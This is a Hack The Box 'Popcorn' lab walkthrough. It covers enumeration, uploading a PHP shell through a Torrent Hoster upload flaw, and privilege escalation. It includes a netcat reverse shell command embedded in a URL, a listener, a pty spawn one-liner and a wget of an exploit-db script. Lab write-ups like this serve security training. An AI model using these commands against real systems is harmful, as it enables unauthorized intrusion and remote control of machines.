Hack The Box: Popcorn




Difficulty: Medium Machine Creator: ch4p Tools Used:

NMAP Gobuster Searchsploit PHP Burp Suite Python

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.6

HTTP


Gobuster

We have verified that there is a web server we can start with scanning for directories in the website.

gobuster -u http://10.10.10.6 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40

HTTP


Searchsploit


A searchsploit search shows that the Torrent Hoster webpage is vulnerable to uploads.

Torrent Hoster









Here I’ve uploaded a new logo for our kali torrent.




Burp Suite

I’m starting the burp suite by repeating the same process of uploading the screenshot while using burp as a proxy.




echo <Base64 Hash> |base64 -d > file

Exploit upload

Now we can start on uploading an exploit to this server.







Reverse Shell

We need to set up our local netcat listener

nc -lvnp 1234

In the url, we can execute netcat on the remote server by replacing the whoami with the netcat command

http://10.10.10.6/torrent/upload/1a17df934566f21b12489987f070671223b23a9d.php?exploit=nc%20-e%20/bin/sh%2010.10.14.11%201234


python -c ‘import pty; pty.spawn(“/bin/sh”)’

User.txt


Privilege Escalation

ls -a



wget http://www.exploit-db.com/download/14339.sh

Exploitation Error


Python PTY Shells

https://github.com/infodox/python-pty-shells git clone https://github.com/infodox/python-pty-shells.git








SSH


Root.txt


#FileUploadVulnerabilty #RemoteCodeExecution